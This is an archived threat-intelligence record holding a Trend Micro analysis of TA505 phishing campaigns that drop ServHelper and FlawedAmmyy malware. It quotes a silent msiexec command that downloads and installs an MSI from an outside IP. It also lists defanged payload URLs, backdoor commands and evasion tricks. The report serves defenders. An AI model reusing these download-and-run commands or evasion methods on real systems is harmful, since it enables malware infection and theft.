{
	"id": "68545478-27b2-45b5-9f0f-d5517b53bf5e",
	"created_at": "2026-04-06T00:12:10.062369Z",
	"updated_at": "2026-04-10T13:11:30.977469Z",
	"deleted_at": null,
	"sha1_hash": "f154aa01749bc4331a34653089562f1b2dbae3ff",
	"title": "TA505: Variety in Use of ServHelper and FlawedAmmyy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 968375,
	"plain_text": "TA505: Variety in Use of ServHelper and FlawedAmmyy\r\nBy By: Trend Micro Aug 27, 2019 Read time: 9 min (2545 words)\r\nPublished: 2019-08-27 · Archived: 2026-04-05 14:24:24 UTC\r\nTA505 continues to show that as a cybercriminal group, they intend to wreak as much havoc while maximizing\r\npotential profits. Given the group's active campaigns since our updates in June and July, we continued following\r\ntheir latest campaigns. Just like in previous operations, they continue to make small changes, such as targeting\r\nother countries, entities, or the combination of techniques used for deployment, for each campaign. Despite the\r\nchanges, TA505 continues to use either FlawedAmmyy RAT (remote access trojan) or ServHelper as payloads.\r\nHowever, over the last nine campaigns since our June report, they also started using .ISO image attachments as the\r\npoint of entry, as well as a .NET downloader, a new style for macro delivery, a newer version of ServHelper, and a\r\n.DLL variant of FlawedAmmyy downloader. The group also started targeting new countries, such as Turkey,\r\nSerbia, Romania, Korea, Canada, the Czech Republic, and Hungary.\r\n.ISO, enabled macros for entry dropping ServHelper or FlawedAmmyy\r\nWe noticed that the group became active again in the middle of July, targeting Turkish and Serbian banks with\r\nemails that had .ISO file attachments as a means of entry. While the method is not newnews- cybercrime-and-digital-threats, the change in file type may yield successful infections given the unusual malware delivery\r\ntechnique. Emails with an attached .ISO image is an .LNK file that uses command line msiexec to execute an MSI\r\nfile from a URL such as hxxp://139[.]180[.]195[.]36/pm2.\r\nFigure 1. Infection chains for ServHelper installation\r\nhttps://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html\r\nPage 1 of 14\n\nFigure 2. 
A sample of an .ISO file with an embedded .LNK file\r\nThe pm2 file contains and runs another executable, which is an installer file created using Nullsoft Scriptable\r\nInstall System (NSIS), a free script-driven installer authoring tool for Windows. This NSIS-encapsulated file then\r\ninstalls ServHelper.\r\nFigure 3. .LNK shortcut in .ISO file\r\nIn another sample we obtained, we found an Excel attachment with malicious macros embedded in the file. The\r\nmacros directly download the file created using NSIS installer from hxxp://45[.]67[.]229[.]36/p2, which is the\r\nsame binary we found in the .ISO and .LNK files that install ServHelper.\r\nFigure 4. Email sample with an attached Excel file.\r\nIn another sample, the group made several updates with the versions of ServHelper, one of which included the\r\nstrings in the binary encrypted with a Vigenère cipher.\r\nFigure 5. Encrypted string\r\nWe observed that some of the samples still had errors in the cipher routine. In another routine that was supposed to\r\nresult in a stack overflow, it also displayed an error message. We suspect the developer of this particular sample\r\ncopied and pasted a stack overflow code.\r\nFigure 6. Vigenère cipher in ServHelper and the Delphi code in stack overflow\r\nAnother updated version included encrypted contents of the C\u0026C communication via HTTP (previous versions\r\nhad C\u0026C request and response information in plain text). The encrypted sample — via XOR encoding/URL\r\nencoding — also received a response from the C\u0026C encrypted with XOR. 
The XOR key is embedded in the\r\nbinary; in this case, the key was “lol”.\r\nFigure 7. XOR Encrypted C\u0026C communication\r\nWe also found two new backdoor commands, runmem and runmemxor, that can run additional .DLL commands in\r\nmemory.\r\nshell: Execute command\r\nrunmem: Download .DLL in memory and run\r\nrunmemxor: Download XOR encrypted .DLL and decrypt and run\r\nzakr: Register autorun\r\nslp: Set sleep time\r\nload: Download executable file and run\r\nloaddll: Download .DLL and run\r\nselfkill: Uninstall itself\r\nThe newer version shows that the developers behind ServHelper continued to upgrade it to evade detection and\r\nadd more functions, possibly for even more iterations in the future. In a campaign targeting thousands of Korean\r\nbusinesses, we found an .ISO attachment — used as the malicious downloader — disguised as a confirmed flight\r\nticket from a popular airline.\r\nFigure 8. TA505 spoofing an airline company as a malicious file attachment.\r\nIn a slightly different technique still targeting Korean enterprises, the .ISO files either contained an .LNK file such\r\nas the previous iteration, or a .NET-compiled downloader.\r\nFigure 9. Infection chains for FlawedAmmyy installation\r\nFigure 10. Screenshot of decompiled script from the .ISO file with a .NET downloader embedded in the e-ticket.\r\nOther samples also included an Excel file attachment with malicious macros that install FlawedAmmyy, or a URL\r\nincluded in the email that supposedly downloads the file needed to download the malware.\r\nFigure 11. 
.LNK embedded in the .ISO file\r\nBoth versions tried to download and execute files km1 or km2, an .MSI installer that executes the FlawedAmmyy\r\ndownloader. This, in turn, downloads an RC4-encrypted FlawedAmmyy RAT payload from\r\nhxxp://92[.]38[.]135[.]67/2.dat or hxxp://27[.]102[.]70[.]196/1.dat that automatically decrypts and executes the\r\nmalware. This was also previously documented by an ESET security researcher. On the samples that used a URL\r\nin the email content, we also noticed that the type of document file that it downloaded depended on the URL that\r\nthe user opened. Opening the documents will enable the macros and download the same FlawedAmmyy\r\ndownloader as the .ISO file iteration from hxxp://92[.]38[.]135[.]67 or hxxp://27[.]102[.]70[.]196, with filenames\r\nk1 or k2. In a campaign that targeted Romanian banks, emails used the subject “Fw: copie COC L5H3” and came\r\nwith an .ISO image attachment.\r\nFigure 12. Infection chains for ServHelper installation with .NET downloader\r\nFurther analysis revealed a .NET downloader embedded in the image, along with routines that were almost similar\r\nto those used in the campaign observed targeting Turkish banks. The .NET downloads jm1 — an .MSI installer —\r\nthat installs another NSIS installer, leading to a ServHelper infection in the system.\r\nFigure 13. The decompiled .NET downloader\r\nIn another routine, an Excel file attachment downloads the NSIS installer once the user enables the malicious\r\nmacros from hxxp://109[.]234[.]37[.]15:80/j1 or hxxp://169[.]239[.]128[.]170/j1. 
Both URLs contain the same\r\nbinaries as the ones that the jm1 file installs.\r\nMore typical TA505 campaigns, with old and new targets\r\nThe group's more typical payload and routine involves the use of ServHelper and FlawedAmmyy RAT and\r\nattaching a document embedded with malicious commands and strings. One variant targets Serbian banks with\r\nsubjects pertaining to “payments” or “invoices” applicable in several European languages. Enabling the macros of\r\nthe Excel file downloads a file created using NSIS installer with ServHelper from 79[.]141[.]168[.]105 or\r\n195[.]123[.]213[.]126. We found another routine from a campaign targeting government agencies in Saudi Arabia,\r\nOman, and Qatar with another type of .XLS or .DOC attachment. The emails used in these campaigns used\r\nsubjects pertaining to finance or urgent concerns on insurance policies. A similar campaign targeting Turkish\r\neducational and government institutions used email subjects pertaining to invoice information or personnel\r\npayroll, and Visual Basic for Applications (VBA) .XLS or VBA .DOC macros. Similar to the routine variant in\r\nFigure 6, the Excel VBA macros retrieve the FlawedAmmyy downloader from hxxp://195[.]123[.]245[.]185/r1 or\r\nhxxp://185[.]225[.]17[.]5/r1, which then decrypts and executes FlawedAmmyy RAT from\r\nhxxp://185[.]225[.]17[.]5/2.dat or hxxp://195[.]123[.]245[.]185/1.dat. Meanwhile, the .DOC VBA macros\r\nretrieve the MSI files from hxxp://195.123.245.185/km or hxxp://185.225.17.5/km, which executes the NSIS\r\ninstaller for ServHelper installation. Similar to one of the routines depicted in Figure 9, the group also reused one\r\nof the email samples but changed the targets to India and the United States, and added content referring to\r\ninvoices. The email may contain different documents, but the URLs for downloading ServHelper as the payload\r\nremain the same.\r\nFigure 14. 
One of the more typical techniques employed by TA505.\r\n.DLL downloaders that deliver FlawedAmmyy and newly styled macros\r\nIn the first week of August, we noticed the group using a different approach and style to fetch the downloaders via\r\nmacros. While FlawedAmmyy RAT was still the final payload, the downloader was different — this operation\r\nused a .DLL variant. This particular campaign targeted Canada with subjects asking for confirmation of numbers\r\nfrom the marketing department.\r\nFigure 15. Infection chain with .DLL FlawedAmmyy downloader\r\nThe attached document asks the user to enable the macros, which creates an Internet Explorer object instance.\r\nThis loads a text file from a hardcoded website, wherein the content of the document file is parsed through and the\r\ninner text of the document is loaded. Our analysis showed that this is likely done so the malicious file can bypass\r\nsome firewall rules, since the communication uses Internet Explorer.\r\nFigure 16. Sample document with malicious macros.\r\nFigure 17. Text file using Internet Explorer for communication to bypass firewall rules.\r\nThe downloaded file is a text file with a single number on each line. The macros process the downloaded payload\r\nwith each number encrypted in XOR with a constant hardcoded value of 106. The result is an executable file\r\nwritten to the disk and executed.\r\nFigure 18. Executable file written to disk and executed\r\nThe executed .DLL is packed using two layers: a custom packer for the first stage and UPX (Ultimate Packer for\r\nExecutables) for the second stage. The unpacked payload in memory is also a .DLL — it's the first time we've\r\nseen a FlawedAmmyy downloader as a .DLL. 
As we further analyzed the main behavior by downloading the\r\nencrypted FlawedAmmyy RAT and decrypting it with RC4, we found that it was similar to the previous\r\ncampaigns, but with a few updates. The first update is the use of the socket API to send an HTTP request instead\r\nof wininet or winhttp API to download an encrypted FlawedAmmyy, building an HTTP header by itself. This\r\ncould likely be an effort to bypass API hooking for HTTP.\r\nFigure 19. Send HTTP request using socket API\r\nThe second change: The decrypted FlawedAmmyy RAT is now saved as dllhots.exe in C:\\temp\\ (it used to be\r\nsaved as wsus.exe). Lastly, this new FlawedAmmyy downloader overwrites some PE header members with\r\nrandom values. Specifically, it overwrites the checksum, the address of relocation table in DOS header, and the\r\nchecksum in optional headers.\r\nFigure 20. Original PE header members (left) vs. overwritten header members (right)\r\nThe decrypted FlawedAmmyy RAT is slightly different from the one that TA505 reused over its past campaigns.\r\nWhile the previous strings had the modified AmmyyAdmin binary since the source code was leaked, TA505\r\nchanged the strings in this sample to PopssAdmin. This may bypass detection rules if the systems’ lists were not\r\nupdated.\r\nFigure 21. Significant changes in the binary\r\nIn another sample targeting South Korea, the difference with the previous case is the XOR encryption hardcoded\r\nat 180. We also found that the file delivered is an .MSI executable containing the same .DLL FlawedAmmyy\r\ndownloader. From the document embedded with the malicious macros, the macro code calls “Run” on the\r\nWScript.Shell object. 
Most of the strings forming the final command are stored in the “Tag” properties of a form\r\nembedded in the document.\r\nFigure 22. Sample document in Korean asking the user to enable the macros.\r\nFigure 23. Final command strings in document’s “tag” properties.\r\nThe final command executes the download and installation of the .MSI file into\r\nC:\\Windows\\System32\\msiexec.exe\" back=13 error=continue /i http://92[.]38[.]135[.]99/99.msi /q\r\nOnLoad=\"c:\\windows\\notepad.exe\r\nFigure 24. .MSI file installed in the system\r\nFrom the parameters above, “/i” means install, “/q” means quiet. The other three parameters do not appear to be\r\nused at all, as reported in the install log (by adding /L*V \"C:\\example.log\" parameter). The .MSI file is a\r\ndownloader with the .DLL FlawedAmmyy downloader inside; it retrieves the final payload, then decrypts and\r\nexecutes FlawedAmmyy RAT.\r\nFigure 25. Unused parameters from log\r\nAround the second week of August, we found a campaign targeting banks in the Czech Republic with subjects\r\npertaining to credit and NAV transfer. Analysis of the samples revealed that the document and macro style was\r\nsimilar to the Korean campaign that used .MSI files, but this campaign downloads from\r\nhxxp://185[.]17[.]122[.]220/555.msi or hxxp://159[.]69[.]54[.]146/555.msi. This .MSI file delivers the NSIS-packed ServHelper, and the binary shares the same C\u0026C server as the campaign targeting Saudi Arabia, Oman,\r\nQatar, and Turkey.\r\nSuspicious activity using ServHelper\r\nA campaign targeting China spoofed FedEx-themed emails with subjects pertaining to delivery problems, failures,\r\nor notifications. 
Instead of attachments, it had malicious URLs in the message content that lead to the download of\r\na malicious document named fedex.doc from hxxp://www.fedexdocs[.]top/fedex.doc or\r\nhxxp://www.fedexdocs[.]icu/fedex.doc. The VBA macro in the document downloads an NSIS-packed executable\r\nfrom hxxps://senddocs[.]icu/stelar.exe, which installs ServHelper. However, while initial analysis of the macro it\r\nused made us believe that this was from TA505, the macros’ obfuscation and style turned out to be more similar to\r\nthe ones described in this post, based on the code page, senders, and fast flux. This particular campaign did not\r\nmatch TA505’s technique. Thus we suspect that other cybercriminals purchased or borrowed ServHelper from the\r\nunderground market for this campaign.\r\nConclusion\r\nA number of ServHelper samples can be found in the wild, but some do not appear to be attributed to TA505. One\r\nsuch sample (reported by a researcher that used the Twitter handle James_inthe_box), delivered Remcos,\r\nseemingly with a TA505 pattern. However, we think it may be more likely that ServHelper is sold to other\r\nmalicious actors and tested on possible targets. In the long run, as more changes are added to the malware, this can\r\nmake attribution to specific groups more difficult.\r\nThe changes and adjustments that TA505 made from the original ServHelper and FlawedAmmyy routines may\r\nindicate that the group is experimenting and testing to determine which forms of obfuscation can bypass\r\ndetections, resulting in more financial returns. It's also possible that the changes in target countries and industries\r\nare driven by the group’s customers; targeting new victims and even returning to previously targeted countries and\r\norganizations with new techniques. 
This also gives TA505 more data on which types of files can be further used\r\nfor detection evasion, or even to deter attribution.\r\nGiven the frequency of changes in routines and deployment from our previous articles, we can expect TA505 to\r\ncome up with more methods for payload delivery, malware types, and combinations of previously used and new\r\nroutines. Further, as the malware is still being upgraded, more iterations can be expected in the future. If not\r\nremoved completely, malicious actors can still take control of computers, peripherals, sensitive information, and\r\nproprietary data.\r\nAs they continue to target businesses in different sectors, we can expect TA505 to keep using phishing and social\r\nengineering techniques to compromise systems. Enterprises are advised to strengthen their online systems,\r\nespecially email gateways. Enforce the principle of least privilege, as well as\r\na patch management and system update procedure to make sure the entire network is protected. Install redundant\r\nand multilayered protection systems from the gateway to the endpoint that can detect and block malicious URLs,\r\nemails, and attachments, as well as proactively monitor other possible attack\r\nvectors.\r\nEnterprises can consider Trend Micro™ endpoint solutions such as Trend Micro Smart Protection\r\nSuites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats\r\nby detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro\r\nDeep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious\r\nattachments and URLs. 
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that\r\ndelivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced\r\ntargeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365,\r\nGoogle Apps, and other hosted and on-premises email solutions. The indicators of compromise (IoCs) related to\r\nthese campaigns we observed are in this appendix.\r\nSource: https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html"
	],
	"report_names": [
		"ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434330,
	"ts_updated_at": 1775826690,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f154aa01749bc4331a34653089562f1b2dbae3ff.pdf",
		"text": "https://archive.orkl.eu/f154aa01749bc4331a34653089562f1b2dbae3ff.txt",
		"img": "https://archive.orkl.eu/f154aa01749bc4331a34653089562f1b2dbae3ff.jpg"
	}
}